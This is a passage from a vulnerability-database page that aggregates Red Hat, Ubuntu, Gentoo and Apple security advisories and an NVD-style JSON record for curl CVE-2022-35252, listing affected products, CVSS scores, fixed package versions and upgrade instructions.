For Red Hat Advanced Cluster Management for Kubernetes, see the following documentation for details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online

Bugs fixed (https://bugzilla.redhat.com/):

2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command 2208376 - CVE-2023-32314 vm2: Sandbox Escape 2208377 - CVE-2023-32313 vm2: Inspect Manipulation

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Low: curl security update Advisory ID: RHSA-2023:2478-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:2478 Issue date: 2023-05-09 CVE Names: CVE-2022-35252 CVE-2022-43552 ==================================================================== 1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.

Security Fix(es):

curl: Incorrect handling of control code characters in cookies (CVE-2022-35252)
curl: Use-after-free triggered by an HTTP proxy deny response (CVE-2022-43552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.2 Release Notes linked from the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies 2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response

Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64: curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-devel-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm

ppc64le: curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-devel-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm

s390x: curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-devel-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm

x86_64: curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-devel-7.76.1-23.el9.i686.rpm libcurl-devel-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source: curl-7.76.1-23.el9.src.rpm

aarch64: curl-7.76.1-23.el9.aarch64.rpm curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-minimal-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm

ppc64le: curl-7.76.1-23.el9.ppc64le.rpm curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm

s390x: curl-7.76.1-23.el9.s390x.rpm curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-minimal-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm

x86_64: curl-7.76.1-23.el9.x86_64.rpm curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-7.76.1-23.el9.i686.rpm libcurl-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-minimal-7.76.1-23.el9.i686.rpm libcurl-minimal-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2022-35252 https://access.redhat.com/security/cve/CVE-2022-43552 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx nN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB oxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su xFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh L1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy C6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL mGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB 27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT D75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17 r2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ /iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88 Yxf4bV/uBmU=HlZ2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:

VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync

or the VolSync open source community website at: https://volsync.readthedocs.io/en/stable/.

Security fix(es): * CVE-2023-3089 openshift: OCP & FIPS mode

Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "12.6.3"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.85.0"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "12.0.0"
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.7.3"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "176746"
      },
      {
        "db": "PACKETSTORM",
        "id": "172378"
      },
      {
        "db": "PACKETSTORM",
        "id": "172587"
      },
      {
        "db": "PACKETSTORM",
        "id": "172195"
      },
      {
        "db": "PACKETSTORM",
        "id": "174080"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2022-35252",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "LOW",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.2,
            "id": "CVE-2022-35252",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-35252",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-35252",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202208-4523",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202208-4523"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-35252"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a\"sister site\" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84. ==========================================================================\nUbuntu Security Notice USN-5587-1\nSeptember 01, 2022\n\ncurl vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\ncurl could be denied access to a HTTP(S) content if it recieved\na specially crafted cookie. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nAxel Chong discovered that when curl accepted and sent back\ncookies containing control bytes that a HTTP(S) server might\nreturn a 400 (Bad Request Error) response. A malicious cookie\nhost could possibly use this to cause denial-of-service. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\ncurl 7.81.0-1ubuntu1.4\nlibcurl3-gnutls 7.81.0-1ubuntu1.4\nlibcurl3-nss 7.81.0-1ubuntu1.4\nlibcurl4 7.81.0-1ubuntu1.4\n\nUbuntu 20.04 LTS:\ncurl 7.68.0-1ubuntu2.13\nlibcurl3-gnutls 7.68.0-1ubuntu2.13\nlibcurl3-nss 7.68.0-1ubuntu2.13\nlibcurl4 7.68.0-1ubuntu2.13\n\nUbuntu 18.04 LTS:\ncurl 7.58.0-2ubuntu3.20\nlibcurl3-gnutls 7.58.0-2ubuntu3.20\nlibcurl3-nss 7.58.0-2ubuntu3.20\nlibcurl4 7.58.0-2ubuntu3.20\n\nUbuntu 16.04 ESM:\ncurl 7.47.0-1ubuntu2.19+esm5\nlibcurl3 7.47.0-1ubuntu2.19+esm5\nlibcurl3-gnutls 7.47.0-1ubuntu2.19+esm5\nlibcurl3-nss 7.47.0-1ubuntu2.19+esm5\n\nUbuntu 14.04 ESM:\ncurl 7.35.0-1ubuntu2.20+esm12\nlibcurl3 7.35.0-1ubuntu2.20+esm12\nlibcurl3-gnutls 7.35.0-1ubuntu2.20+esm12\nlibcurl3-nss 7.35.0-1ubuntu2.20+esm12\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: curl: Multiple Vulnerabilities\n     Date: December 19, 2022\n     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n       ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl              \u003c 7.86.0                    \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2023-01-23-5 macOS Monterey 12.6.3\n\nmacOS Monterey 12.6.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213604. \n\nAppleMobileFileIntegrity\nAvailable for: macOS Monterey\nImpact: An app may be able to access user-sensitive data\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2023-23499: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n(wojciechregula.blog)\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.86.0. \nCVE-2022-42915\nCVE-2022-42916\nCVE-2022-32221\nCVE-2022-35260\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.85.0. \nCVE-2022-35252\n\ndcerpc\nAvailable for: macOS Monterey\nImpact: Mounting a maliciously crafted Samba network share may lead\nto arbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nCVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco\nTalos\n\nDiskArbitration\nAvailable for: macOS Monterey\nImpact: An encrypted volume may be unmounted and remounted by a\ndifferent user without prompting for the password\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)\n\nDriverKit\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A type confusion issue was addressed with improved\nchecks. \nCVE-2022-32915: Tommy Muir (@Muirey03)\n\nIntel Graphics Driver\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2023-23507: an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23504: Adam Doup\u00e9 of ASU SEFCOM\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to determine kernel memory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. (@starlabs_sg)\n\nPackageKit\nAvailable for: macOS Monterey\nImpact: An app may be able to gain root privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23497: Mickey Jin (@patch1t)\n\nScreen Time\nAvailable for: macOS Monterey\nImpact: An app may be able to access information about a user\u2019s\ncontacts\nDescription: A privacy issue was addressed with improved private data\nredaction for log entries. \nCVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)\n\nWeather\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an\nanonymous researcher\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved memory handling. \nWebKit Bugzilla: 248268\nCVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\nWebKit Bugzilla: 248268\nCVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\n\nWindows Installer\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23508: Mickey Jin (@patch1t)\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Nick Stenning of Replicate for their\nassistance. \n\nmacOS Monterey 12.6.3 may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThe following advisory data is extracted from:\n\nhttps://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json\n\nRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat\u0027s archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Summary:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 General\nAvailability release images, which fix security issues and update container\nimages. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/\n\nSecurity Fix(es):\n* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n* CVE-2023-32314 vm2: Sandbox Escape\n* CVE-2023-32313 vm2: Inspect Manipulation\n\n3. Solution:\n\nFor Red Hat Advanced Cluster Management for Kubernetes, see the following\ndocumentation for details on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n2208376 - CVE-2023-32314 vm2: Sandbox Escape\n2208377 - CVE-2023-32313 vm2: Inspect Manipulation\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Low: curl security update\nAdvisory ID:       RHSA-2023:2478-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:2478\nIssue date:        2023-05-09\nCVE Names:         CVE-2022-35252 CVE-2022-43552\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Incorrect handling of control code characters in cookies\n(CVE-2022-35252)\n\n* curl: Use-after-free triggered by an HTTP proxy deny response\n(CVE-2022-43552)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 9.2 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies\n2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-devel-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-devel-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-devel-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-